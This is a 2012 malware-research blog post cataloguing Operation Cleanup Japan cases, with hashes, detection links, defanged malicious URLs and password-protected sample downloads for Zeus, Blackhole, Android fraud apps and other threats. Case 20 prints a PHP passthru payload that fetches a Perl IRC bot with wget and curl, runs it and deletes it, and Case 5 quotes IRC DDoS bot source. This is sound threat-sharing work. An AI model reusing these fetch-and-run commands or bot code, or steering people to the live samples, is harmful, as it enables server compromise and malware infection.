Pages

Thursday, May 3, 2012

Operation Cleanup Japan (OCJP) by 0Day.jp May 3


Operation Cleanup Japan (OCJP)  ( 【報告】オペレーション「Cleanup Japan」 / #OCJPとは?is the project initiated by Hendrik Adrian to make the Japanese internet safer through exposure of badware sites and data, the shutdown of malicious sites and in helping the Japanese community learn from security professionals about how to recognize and prevent malware.

0DAY.JP <http://unixfreaxjp.blogspot.com/> is the project blog and it is in Japanese. We will link to his publications - via Google translation  and provide you with the relevant samples. This will be an ongoing post with future updates. Please support OCJP and enjoy.
P.S. Contact Hendrik if you have difficulty understanding Google translation of some words or need help with screenshots. IE and Chrome handle the translated text formatting better than Firefox. Except when indicated otherwise, I did not analyze these samples and might not be able to answer questions.

Red dots indicate the sample download links - same password on all by the scheme. Email me if you need it. With many thanks to Hendrik for his work and contributions.
DOWNLOAD ALL SAMPLES FROM THIS FOLDER OR FROM LINKS BELOW

 2012-04-18 Case 39 ◘ Zeus

ANALYSIS:   Phoenix Exploit pack with Zeus payload

Scan result is : VT (22 / 40) https://www.virustotal.com/file/5d8ccccd487c21e40b0d6d96a853bdb70b685e6d711b01334cb520d4f8fc7de8/analysis/1334754363/


 Download (password infected)


File: clxsimbrinel.pdf
Size: 13235
MD5:  0E24D38ADC791529565AFE905D60B733 

 2012-04-12 Case 38 ◘ Linkedin malvertizement with Dapato / Cridex/ Carberp

ANALYSIS:   OCJP-038 Fake Linkedin with Dapato/Cridex/Carberp

Malicious  domains/Urls

hxxp://nexe-japan.com/link.html
hxxp://baiparz.com/main.php?page=f93de12c807d28df
hxxp://baiparz.com/w.php?f=19975

Virustotal 

 Download (contact me if you need the password)



File: wpbt0.dll
Size: 198656
MD5:  CCAECA990F2C7C416B8AA03795ABADA1

 2012-04-10 Case 37 ◘ Phoenix -> Zeus

ANALYSIS:   Phoenix Exploit pack with Zeus payload 112.78.124.115  and  219.94.194.138

 Download (contact me if you need the password)


File: clxsimbrinel.pdf
Size: 13235
MD5:  0E24D38ADC791529565AFE905D60B733 

File: frf3.php
Size: 147496
MD5:  65AC9035D47DFCB632A24A95098090B6

File: hQj.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

File: shellcode-LibTiff.bin
Size: 514
MD5:  A1441AF1787638F5FA6E6C8DCA015DE2

File: Vdqu.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

File: Y9fNYJCs.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

 2012-04-04 Case 35 ◘ Blackhole+>Zeus

ANALYSIS:   #OCJP-035 hirochan.boo.jp/210.172.144.77

 Download (contact me if you need the password)

Other files included
     ap2.php@f=ba33e
    js.js
    q.php@f=14095.exe
    q.php@f=ba33e.exe
    showthread.php@t=d7ad916d1c0396ff
    showthread.php@t=d7ad916d1c0396ff.1
 
File: q.php@f=14095.exe
Size: 296488
MD5:  D025064D50C23C46AF1D3F85C1AB780C

File: q.php@f=ba33e.exe
Size: 95272
MD5:  C3E5699E9A715B28B54B7850B6610E7A

 2012-03-31 Case 31 ◘ Blackhole+>Zeus

ANALYSIS:   #OCJP-031 210.172.144.247 Blackhole Zeus
 https://www.virustotal.com/file/e8ff5440fda478428a2907a30a80a3f5a83c82483abb9259b7d7fb6fddfcfa02/analysis/

https://www.virustotal.com/file/91d4fe27c2818884584fe10fccbe9e23074719862b2f167fb0ede3e77d64f18d/analysis/

 https://www.virustotal.com/file/eeae03329af8fe01967a09c0e25cc9d2e166acab450e4c48006121225720705e/analysis/

https://www.virustotal.com/file/56bc492740bc6fb794d25e42ab8d963cf6f054368bb77164f78b347440c960a4/analysis/

https://www.virustotal.com/file/2187029f2e79100226ff1b9904281e05e2fad10b15deac28a9e4bde63f3081e0/analysis/

Download (contact me if you need the password)

Other files included
     index.html
    js.js
    payload(q.php).exe
    showthread.php
    sVK4XT.exe

File: sVK4XT.exe
Size: 323624
MD5:  D7D5D3E4B6C115C73D7A765BDFFC3DE1

File: payload.exe
Size: 151081
MD5:  E8E7929311808960DDD431518AF8CCF3

File: js.js
Size: 75
MD5:  82ECBEA3CEEF3A87AC466E78ACACCEC5

 2012-03-27 Case 28 ◘ CVE-2011-3544 Blackhole Java

ANALYSIS:   #OCJP-028:CVE-2011-3544 Java

Virustotal

File: Qai.jar
Size: 17116
MD5:  B307484E98EF3C6D81D66BFAB549D387






 Download (password infected)

Other files included
index.html dddbb9957ee206141588deef662442f5 ← VT(2/43)
js.js d3f469a73c94e8490deab380dacd5929 ← VT(2/43)
Qai.jar b307484e98ef3c6d81d66bfab549d387 ← VT(6/43)
showthread.php 5301b4507b67279162de837aa34742c1 ← VT(4/43)



 2012-03-18 Case 27 ◘ Blackhole IFrame

ANALYSIS:   #OCJP-027:Wordpress vulnerablitiy exploited - IFrame leading to Gaveover zeus

 Virustotal


Download (email me if you need the password scheme)




 2012-03-17 Case 26 ◘ Contents of capture-site.com Android malware development/distribution site

ANALYSIS:   #26 Exposing the Android Fraud #Malware Development Site

 Contents of capture-site.com Android malware distribution site
 


Download (password infected)


Site Tree
Apk and Java files
File: btm.apk  - Virustotal
MD5:  7157BA9A8E10253C57B39B05701C6BD8

File: ctm.apk - Virustotal
MD5:  677492027E802361CADF63B11B214A83

File: dtm.apk - Virustotal
MD5:  5C6B9D027DCCF7EA65EC80A005E81E31

File: dtm.apk - Virustotal
MD5:  3E78174EC0DC3DBB58D6B5C77321BA8C

File: dtm.apk - Virustotal
MD5:  9ABC414CEEA92BE88B939CDC5304AE13

File: k_test.apk - Virustotal
MD5:  E2B1FF0CFF01F6AA3DE557F26679AC08

File: Kitchen Timer.apk Virustotal
MD5:  74E71F9E28E69B5D045DF3A18A6A93B0

File: ktm.apk - Virustotal
MD5:  C4D631D2DED1F20BCD752D573BE707DA

Main.class

R.class

KitchenTimerService.class

View2.class



 2012-03-14 Case 25 ◘ Gameover Zeus

ANALYSIS:   #OCJP-025:Gameover Zeus

 Virustotal

File: BtxX9KX.exe
Size: 278016
MD5:  17BDE98108092ED612C4511BD6A633EE
 

 2012-03-06 Case 24 ◘ Blackhole IFrame

ANALYSIS:   #OCJP-024:IFRAME malware via Blackhole Exploit Japanese version of the site (Moveable Type)vulnerability

 Virustotal

File: index.html
MD5:  89d3151d1188d7a7c543254cb2cc1765
Size: 33046
 



 2012-03-03 Case 23 ◘ VBS Redlof
ANALYSIS:   #OCJP-023: Service "www.fc2web.com" 1GB free website has been infected with the "VBS / Redlof.A" virus

Files included (each with VBS Redlof)
    19.html
    50.html
    bisuke00.html
    doukikai2001.htm
    event.htm
    howto.html
    index.html
    index1.html
    index2.html
    killu001.html
    link.html
    loki003.html
    main3.htm
    sub3.htm
    union.html

Virustotal




 2012-02-29 Case 22 ◘ Blackhole IRS tax landing page with IFrame redirect

ANALYSIS:   #OCJP-022: IFRAME-REDIRECTOR BLACKHOLE

■ The blog site of the sites below ↓
suri-emu.co.jp / 125.206.128.37 suri-emu.co.jp / 125.206.128.37
File: reven.html
MD5:  24de85fbbf9fdb50f055c10a9d1adaad

File: ir.html
MD5:  48499618d889a335398b996336de0326



 2012-02-26 Case 21 ◘  Chinese Win32.Ripinip / "Iprip" backdoor trojan


ANALYSIS:   #OCJP-021 (219.66.232.108 IP) IIS server infection in China are China Ripinip backdoor Trojans in the network of ODN / JAPAN TELECOM

Good description of this variant here by Kaspersky -Backdoor.Win32.Ripinip.otb


I also submitted them to threatexpert - search for them by hashes - they don't have results yet at the moment.

All files are PE binaries, not rar archives

 File: set.rar
MD5:  642ef29e0194075c830d0f2a418d8fce
Size: 28672

File: stL1.rar
MD5:  ecb3012685ac3c803817999dee39712c
Size: 249856

File: vel19.rar
MD5:  28663dc50d4400e05de15db7cffcbb79
Size: 73728




Some strings




 2012-02-26 Case 20 ◘  WordPress theme vuln - PHP downloader and Perl IRC DDoS Trojan.IRC-BOT IRC-FLooder/Backdoor

It was in the news in the beginning of August 2011 as many sites were scanned and exploited.




File: pani2.jpg
MD5:  849927dae774a1909ae6e27c1c3a8869
Size: 2771

Ascii Strings:
---------------------------------------------------------------------------
<?php
@passthru('cd /tmp;wget http://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;curl -O http://gutchi.jp/wp//wp-content/themes/delicate/cache/unix.txt;perl unix.txt;rm -rf unix.txt*');
... etc


---------------------------------------------------------------------------
#!/usr/bin/perl
#   PENGATURAN
#############################################################################
my $server   = "multiplay.uk.quakenet.org";
my $port     = "6667";
my $channel  = "#marxone";
my $owner    = "marxone","ugal";
my $procname = "/usr/sbin/httpd";
my $qqum     = "*";
# SOURCE
#############################################################################
my @nickname =
 2012-02-18 Case 19 ◘  Remote Desktop Spyware

ANALYSIS:   #OCJP-019: Remote Desktop spyware

hxxp://huaidan.org/wp-content/uploads/200708/clear3389.rar hxxp :/ / huaidan.org/wp-content/uploads/200708/clear3389.rar 
huaidan.org / 106.187.42.180
 
File: clear3389.exe
Size: 32768
MD5:  A695473047830E6071BC440DC6AB88C3

Virustotal  

File: clear3389.rar
Size: 12986
MD5:  9F9849BA2B9273C821CAF8C29C9B5619




 2012-02-18 Case 18 ◘  VBS.Redlof.A

ANALYSIS:   #OCJP-018:  VBS.Redlof.A

File: index.html
Size: 12069
MD5:  6E9F8D2A5D151E1CB1E78945B48C2369


 2012-02-17 Case 17 ◘  Fraud.FakeTimer-2

ANALYSIS:   #OCJP-017: Fraud.FakeTimer-2

File: sp_k_test.apk
Size: 80119
MD5:  079B92DF0DA0E57C3DFCD5B8D0D2C82C



 2012-02-16 Case 16 ◘ ZeroAccess / Virus.Win32.ZAccess.k


ANALYSIS:  #OCJP-016 221.251.54.213 mayaweb.jp network in Japan


hxxp :/ / s3.mayaweb.jp/videoplayer/shock/Play_Video_Click_Run.exe
 
File: Play_Video_Click_Run.exe
Size: 221696
MD5:  065EFD579429DE85C9A0C55DF7E8CABE
Looks like Hendrik ran into a newer sample of ZeroAccess Rootkit than we already have posted here: contagio: ZeroAccess / Max++ / Smiscer Crimeware Rootkit sample
Driver
 \SystemRoot\System32\drivers\afd.sys
 Download (pass infected on this one)



 2012-02-15 Case 15 ◘  Ramnit

 File: index.html
Size: 882533
MD5:  60472C8443D8888A60BD5074C3BEE62A
File: svchost.exe  - Ramnit
Size: 433615
MD5:  5C282CC69B8932AB64E6DD2F29F64309

 2012-02-14 Case 14 ◘  Trojan Hupigon

ANALYSIS:   #OCJP-014:  Win32.Hupigon

File: 87000.exe
Size: 269312
MD5:  D5E77BA8646906FD8AA42627060E5E42

Virustotal 

hxxp :/ / qhfl880.net/down/87000.exe
hxxp://xogml.net/down/87000.exe


 2012-02-13 Case 13 ◘ Autorun worm + Trojan Pincav
File: vel19.rar  - Autorun worm
Size: 73728
MD5:  5FEDEC6191864124B1B89B8428F1941AVirustotal

File: set.rar - Trojan Pincav
Size: 28672
MD5:  642EF29E0194075C830D0F2A418D8FCE
Virustotal 

hxxp://211.121.253.132/vct/set.rar
hxxp://211.121.253.132/vct/vel19.rar





 2012-02-12 Case 12 ◘ Trojan Vundo.IB
File: yyy.exe
Size: 63108
MD5:  59E3791E05EFA1B04403349BEDBA9F7B





 2012-02-11 Case 11 ◘ Javascript redirector



 2012-02-10 Case 10 ◘ Android Malware - Fake timer

A sample of android spyware the detected in Japanese rental server office, which is using US data
center. This sample will be also posted on Contagiominidump.blogspot.com for mobile malware collection

hxxp://www.14243444.com/appli02.php
hxxp://14243444.com/appli02.php
hxxp://206.223.148.230/~pj629g01/appli02.php
hxxp://banana8310.maido3.com/~pj629g01/appli02.php
hxxp://banana3247.maido3.com/~pj629g01/appli02.php
 


File: sp_ntm.apk
Size: 80060
MD5:  44D31414A63A090E5A54670C33E0D1BC

Virustotal



The scheme, as described by Hendrik, is as follow>
It is a timer application that will connect to the adult site to download adult videos.
Once it starts, it collects system data. Runs as process as http client, performs sync to the adult site and sends user data - google/smartphone information to the adult site, which is triggered by timers.
 
 2012-02-08 Case 08 ◘ Trojan Downloader PWS:Win32/OnLineGames.FR

Microsoft - PWS:Win32/OnLineGames.FR
PWS:Win32/OnLineGames.FR
is a trojan that steals passwords and other sensitive information. It can also download arbitrary files from certain Web servers.

File: TWCI.scr
Size: 290279
MD5:  CD565746CAC0AA7FA151EAC39013EA0E
Virustotal



  
 2012-02-03 Case 07 ◘ Trojan Downloader + Spyware/infostealer
File: sqlservt.exe
Size: 392192
MD5:  229A26C15B3E7AFC26F953E43120C723

File: bb.exe
Size: 447270
MD5:  6858EC96B6ADB0F3D94911A46AA817A5

Virustotal bb.exe



 2012-02-02 Case 06 ◘ Keylogger "Perfect Keylogger"

PerfectKeylogger

File: VAutoF2.0.13.exe
Size: 3026829
MD5:  1A835E32B1FEF966E4924B2C6895099C
CleanMX
Virustotal



  
 2011-02-02 Case 05 ◘ IRC PHP DDoS bot

File: 10.jpg
Size: 42942
MD5:  FCCCDB4FB0EEA30C029724C1EB60BAFE
Virustotal

File: 11.jpg
Size: 42923
MD5:  E192A8B06F3606EB5B4438D96B4289F2

Virustotal

Strings
+---------------------------------------------+
|#############################################|
|#[ bot PHP version IRC v5.5
            ]#|
|#[ By Jancok  
            ]#|
|#[ 2010 lebay Community
            ]#|
|#[ irc: #lebay @ jancok.org                ]#|
|#############################################|
+---------------------------------------------+
function rx() {
/* Channel JupIt3r */
$channels = '#ornamen'; // chanell pisahkan dengan spasi
/*** Admin ***/
$admin = 'r4puh';
$JupIt3r_password = 'nik'; //Password untuk auth JupIt3r
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
$showrespone = 0; //1, Nampilin respon dari server irc
//Nick JupIt3r



 2011-12-27 Case 04 ◘ FakeAV


File: 42d58f2ac633da96a50607f45e254f08.exe
Size: 440576
MD5:  42D58F2AC633DA96A50607F45E254F08
Virustotal



  
 2012-01-29 Case 03 ◘ Chinese Trojan Backdoor Dropper Win32/Trojan/Binder

File: 8eef0a7b25c397a3c14179563c8a0f49.exe
Size: 870186
MD5:  8EEF0A7B25C397A3C14179563C8A0F49



 

2011-12-27 Case 02 ◘ Trojan Downloader Seleya/Swisyn


File: sever.exe
Size: 191488
MD5:  8B71F88CC08118D1FF4AA6008DC35A5F

Virustotal






11 comments:

  1. Download link for Case 07 is borked Mila :)

    ReplyDelete
  2. Mila, Big Thank's! Can't say words..

    Below are Additionals:

    --------------------------------------
    #OCJP-009 TROJAN.JAVASCRIPT.IFRAME
    Feb 9th, 2011
    --------------------------------------
    Detected in below sites:
    hxxp://elanjapan.co.jp/ski/
    hxxp://elanjapan.co.jp/ski/index.html
    (infected site w/sample still up & alive , yet the malware site was blocked)

    I wrote obfuscated analysis in here:
    http://unixfreaxjp.blogspot.com/2012/02/ocjp-009elanjapancojp210157515javascrip.html
    PS: Antivirus detection is too poor, Virus Total: 19 / 41
    https://www.virustotal.com/file/eabf7b40ab2b54db1fabc0b004a2a2a54599c1c525ef73ee28948c2ca4c11ceb/analysis/

    ReplyDelete
  3. --------------------------------------
    #OCJP-011 TROJAN-JAVASCRIPT-REDIRECTOR
    Feb 11th, 2011 (Under Mass-Infection)
    --------------------------------------
    Detected in the below urls:
    hxxp://hathomas.searchnavi.jp/dup1rt7it/
    hxxp://muvreela.searchnavi.jp/3jy4hxu1d/
    hxxp://izpe4.searchnavi.jp/gygp84bex/
    hxxp://jakemonky.searchnavi.jp/hgvml1jjx/
    hxxp://bosaxton.searchnavi.jp/nvw1dzjom/
    hxxp://hogratie.searchnavi.jp/f3iug6l68/
    hxxp://hogratie.searchnavi.jp/xdo3fhn34/
    hxxp://hogratie.searchnavi.jp/y1t4u39px/
    hxxp://dirtyrulenta.searchnavi.jp/zvtomi8nz/
    hxxp://maabraha.searchnavi.jp/gofbmtzr4/
    hxxp://blankpage.searchnavi.jp/mdee1ybpa/
    hxxp://maabraha.searchnavi.jp/cv5cjd16i/
    hxxp://sea0tter12.searchnavi.jp/gogkefkbz/
    hxxp://sea0tter12.searchnavi.jp/jenrrvdlr/
    hxxp://sea0tter12.searchnavi.jp/lbyc4mzmo/
    hxxp://sea0tter12.searchnavi.jp/prvpkh3id/
    hxxp://sea0tter12.searchnavi.jp/aixownyns/
    hxxp://sea0tter12.searchnavi.jp/opzqlkmuc/
    hxxp://maabraha.searchnavi.jp/hmjg7bjoa/
    hxxp://maabraha.searchnavi.jp/hvhhadih3/
    hxxp://maabraha.searchnavi.jp/njapfdu5e/
    hxxp://palpaciya.searchnavi.jp/drgcbbzkt/
    hxxp://spcritte.searchnavi.jp/y945iagmq/
    (infected site w/sample still up/alive and GROWING, yet malware site was reported and now registered in many malware blacklist domain)

    I wrote obfuscated analysis in here:
    http://unixfreaxjp.blogspot.com/2012/02/ocjp-011.html

    PS: Antivirus detection Virus Total: 29 / 43 yet some AV products cannot detect the sample like ClamAV, Kaspersky, Dr.Web.. better get the samples since these product's engine are used for some gateways to filter malwares.
    https://www.virustotal.com/file/8b06df8adffb9e2d5da1e8675d58a0095cbf9d6179b693642b29975ec4a04c91/analysis/

    ReplyDelete
  4. These are the latest #OCJP cases which haven't posted here yet.
    Some infected sites has been shutdown so if you guys need to see the sample you can download it from here. Mila is a bit handful at this time, please allow me to add the sample information by this comment as per followings:

    Case No : #OCJP-015
    Date : 2/15/2012
    Malware : Infectiuous Ramnit HTML in Japan
    Report : http://bit.ly/y3PUeF
    Sample : http://dl.dropbox.com/u/32230830/OCJP-015.rar
    VT : http://bit.ly/z7iDel

    Case No : #OCJP-016
    Date : 2/16/2012
    Malware : Chinese Spyware Vundo/Jorik
    Report : http://bit.ly/zEeuvW
    Sample : http://dl.dropbox.com/u/32230830/OCJP-016.rar
    VT : http://bit.ly/xoZdaa

    Case No : #OCJP-017
    Date : 2/17/2012
    Malware : Android.JP.Fraud.FakeTimer-2
    Report : http://bit.ly/w7urmY
    Sample : http://dl.dropbox.com/u/32230830/OCJP-017.rar
    VT : http://bit.ly/ArHZ7o

    Case No : #OCJP-018
    Date : 2/18/2012
    Malware : VBS/RefLof Infected HTML
    Report : http://bit.ly/yIP0IO
    Sample : http://dl.dropbox.com/u/32230830/OCJP-018.rar
    VT : http://bit.ly/wslU3L

    ↑enjoy! for any questions be free to tweet me at @unixfreaxjp

    ReplyDelete
  5. Additionals, we closed the case #OCJP-011 soon after reporting.
    But the infection start to continue AGAIN now, case is re-opened.
    Below is the current new infection:
    hxxp://machampa.searchnavi.jp/z21glgemd/
    hxxp://hpoducky.searchnavi.jp/9oioorzvk/
    hxxp://hpoducky.searchnavi.jp/q6uclbdh7/
    hxxp://hpoducky.searchnavi.jp/g6xnbtfky/
    hxxp://machampa.searchnavi.jp/anjaq5maj/
    hxxp://machampa.searchnavi.jp/vmog6669a/
    hxxp://hpoducky.searchnavi.jp/44dpin7w2/

    same malware, same infection site, assumed same attacker.
    We're on it now.

    ReplyDelete
  6. Case No : #OCJP-019
    Date : 2/19/2012
    Malware : Win32/CMD-Trojan/Chinese-RemoteDesktop-Spyware/HackTool
    Report : http://bit.ly/zzpy8F
    Sample : http://dl.dropbox.com/u/32230830/OCJP-019.rar
    VT : http://bit.ly/yD9syZ

    ReplyDelete
  7. Case No : #OCJP-027
    Date : 3/18/2012
    Malware : Exploit.JS.Blacole, Trojan.Script.Iframer
    Report : http://goo.gl/tA9eK
    Sample : http://dl.dropbox.com/u/32230830/OCJP-027.rar
    VT : http://goo.gl/OGsts

    ReplyDelete
  8. Case No : #OCJP-028
    Date : 3/26/2012
    Malware : Java/exploit/Downloader/CVE-2011-3544.BG
    Report : http://unixfreaxjp.blogspot.jp/2012/03/ocjp-028-b-dashjp-11050202195blackholer.html (JP)
    Sample : http://dl.dropbox.com/u/32230830/OCJP-028.rar
    VT : (Poor Detection Ratio!!)
    https://www.virustotal.com/file/f5550ed10ca22b4828b36c19d948177e380bbf2a1de32c7c0372b38eaf6a3e63/analysis/
    https://www.virustotal.com/file/1cd590ab9f4881f68a6c0eceb0c41d06c0ecc078b56039c71d9861a091c536ae/analysis/
    https://www.virustotal.com/file/f61d98e67737b000321c5d4d1d602bef7e2581e65517a58fa01bae27fa296c62/analysis/
    https://www.virustotal.com/file/6506e9fd2d7fa000df15663d7ddb7f6a76f1acac60c056b35e3bef97698d598e/analysis/

    ReplyDelete
  9. The password for the temporary sample (written in this comment part) the one w/dropbox urls are "infected". For the contagio's site provided sample's password will be the usual scheme (for cotagio's regular users) or please contact Ms. Mila for the newcomers researchers/users.
    For the more technical question you may contact me directly through twitter @unixfreaxjp

    ReplyDelete